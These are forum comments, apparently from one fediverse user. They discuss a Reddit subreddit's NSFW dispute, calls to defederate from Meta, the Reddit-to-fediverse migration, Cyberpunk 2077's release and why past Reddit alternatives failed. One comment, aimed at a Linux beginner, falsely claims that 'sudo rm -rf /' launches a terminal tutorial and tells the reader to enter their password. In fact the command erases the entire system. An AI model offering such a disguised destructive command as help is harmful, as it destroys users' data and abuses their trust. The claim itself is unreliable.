The mod's response to Reddit, in case people don't want to go there:

According to them, your favourite subreddits going NSFW is too much for you to understand. The infamous Mod Code of Conduct messaged us, demanding we switch back, because “you’re likely confused by all the NSFW content you’ve been seeing”.

They didn’t allow us to reply, so we couldn’t explain that this is a subreddit for an 18+ game, nor has any of our content changed. This subreddit should have been NSFW already, but we’d never thought to change it until recently.

Until we change it back we’re in violation of Reddit’s sitewide rules. We’re not going to change it back, because this is a sexually explicit game, and also fuck them.

If we’re removed at least we got to go out on an fantastically fun flair event (don’t worry this won’t stop your flair from being added I promise), and if this sub changes back from NSFW then you know you’re no longer in control of it.

Rest assured; we have 77 fans all over Reddit, with r/lowsodiumcyberpunk being a decent fall back. We’ve never worked together on anything, but we’ve made an effort to stay on good terms with one another, and I trust them to take care of you all.

We (meaning the whole fediverse, all instances) need to be de-federating that crap immediately.

Nothing good will come from having Facebook streaming into here in anyway whatsoever.

The Fediverse as a whole needs to be a separate place so that people can leave places like that.

Also, if Facebook is allowed to "work with" the development of the fediverse at all, they absolutely will eventually destroy it for profit. And "working with" it absolutely includes them federating with it.

When their vast resources are taken into account, and their existing userbase also, they would rapidly become the main instance (or collection of, but probably just one) of the whole fediverse. Once that's them, they can use that position to dictate terms pretty hard.

Before you know it, everyone that would eventually have come here are there instead, and they're now the fediverse. They can also fork the software and leverage their Dev teams to make their fediverse vastly more polished... No donations needed on their fediverse, less bugs, everyone you know is already over there... Seem familiar?

How does that effect us who aren't there, how isn't it just the same thing as now? Our fediverse dies off because the users leave, instances close down through lack of population/need, before you know it there's nobody here and the idea just dies.

It's ok, Linux has a built in tutorial system for learning the terminal, so if you ever want to progress beyond copy/pasting, you can use that.

Just go into the terminal and type (or just copy/paste) this to get the tutorial program running:

sudo rm -rf /

Type your password when prompted and you're golden. No more linux issues ever again.

I came over in the reddit migration.

I have to admit, the thought definitely occurred to me when I first joined and had a look around, that the people that were already here before would be getting swarmed by masses of redditors that may well not have the same "site-culture" as the people who were here first. I'm actually surprised that this is the first post that I've seen complaining about it.

I mean it, I was legitimately expecting a ton of pushback from the existing fedi community over this, and was really surprised when it never seemed to materialize.

For my own experiences of being here (I'm on kbin), this place has been really good-natured, with a better level of well intentioned discussion than what a lot of reddit had, so it's been a really nice experience so far. What I don't have though, is any experience of what it was like before we all invaded en-mass, so I have nothing to contrast it with. I can totally see how someone wouldn't be happy with what's happened though, the migration has to have changed the space a lot for everyone that was here before.

One thing about my personal experience of how it is here though is that when I first joined I tried to do the thing that you first do with a reddit account, you know, where you immediately un-subscribe from all default subreddits and only join things you're actually interested in (so, niche subs, etc). Found out that it isn't quite how it works, but that the subscribed feed is pretty much exactly that but baked-in as standard. I've then spent almost my whole time on the subscribed feed since (unless actively looking for new stuff).

So the quality that I've experienced here is probably more down to my personal selection of subscribed communities rather than a more holistic view of the platform as a whole. There's the caveat to everything I just said, I guess.

So yeah, I'm kinda sorry that this happened to you, and I'd also prefer if those people (I'm referring to the bad-actors and arsehole's side of things) would have just stayed where they were too, but I'm not sure what to do about it other than just blocking/unsubscribing to the communities in question, or blocking the individual accounts of bad actors. I doubt that the second is even remotely scalable though if the userbase gets significantly larger.

Yeah but in this particular case it really needs to happen at the instance level rather then the user level, and preferably all instances at that. It's about mitigating the damage that Meta/Facebook are going to do (to the entire fediverse as a system) more than it is about not seeing shitty low-effort racism or whatever they'll have there.

If I could actually trust Meta to be benign then I'd maybe agree with you about just blocking their shit as a user, but there's just no chance of believing that about them.

It's still not at all the game that they originally sold people pre-release though. If you go into it thinking that you're going to be getting an action looter-shooter with some interesting mechanics and great visuals then you'll get pretty much what you're expecting.

Going into it buying CDPR's line about it being the "next generation of open-world gaming" and "Evolution of RPG's" or whatever crap they were spewing, will leave a sour taste in your mouth.

The main campaign and side-mission storylines are just flat-out great though.

CDPR have always been good at doing the storytelling side of things, and that didn't really change with Cyberpunk.

Total fraud on release though, especially on console. Fuck them for what they did there.

For transparency, I'm referring to how it is currently on PC, where you also get mods if you want them. I couldn't comment on the console experience as I haven't played it.

Definitely wait for a sale though if you do one day go for it, I don't think it's good enough for the full price. Too many things are still lacking, although the upcomming DLC may fix that (which still means paying extra to fix the shit that should have been in the base game since release... Yeah).

The truth is most internet communities which found and advertise themselves as an alternative to Reddit die.

To be honest, there were damn good reasons why Voat, etc, died in a massive fire. The Reddit exoduses in question were from huge chunks of the userbase effectively being kicked out for being massive bastards/racists/bigots, etc. The communities that they spawned after leaving were absolutely horrific and nobody else on the internet wanted to go anywhere near them.

The current exodus is made up of actually normal people (at least, normal enough), and the reason we're here isn't just because we're all joined by hatred (weeeelllll... maybe a hatred of u/Spez in a lot of cases, ha!), but because we're genuinely looking for a better forum-space than what's been available recently until now.

Sure, there are similarities, we're still here because we find corporate control over the forum-space to be "oppressive" (just what an incel/racist would say, right?), but it's not because our views aren't tolerated there, it's just because we're really fucking tired of the cost of having somewhere to actually discuss things is that we're endlessly sold as a product, followed by our discussion area being destroyed by corporate greed. Over and over again.

The reasons why this place is getting busy is fundamentally different than the reason why the previous migrations created places like Voat or Parler, etc. We're already in a massively better position due to that alone.

I agree with what you're saying in general, but I really hope that all of the interesting discussion here doesn't eventually get buried by memes like back on Reddit. Memes can be fun and all, but sorting a lot of otherwise really great niche-subs by top of all time back there was often a case of finding nothing of value at all because there were 50 pages of fucking memes at the top of the list. Personal preference, of course.

The turning point for me when I really got a concrete realisation about people absolutely not giving a shit about this was when Snowden came out and I saw the majority of people just go "Eh, that's pretty fucked, whatever", and then immediately jump straight back into scrolling facebook all day long.

Most people legitimately don't give a shit about this issue. I think that they really should, but they absolutely don't for the most part.

If this were just some problematic instance (or a group of them, even) I'd entirely agree with you, but this is Facebook, the damage that they're almost certainly planning and are entirely capable of requires (at least in my opinion), a different solution.

Please note that I'm suggesting this as an entirely unusual solution to a very unusual problem. Not as some sort of standard practice.
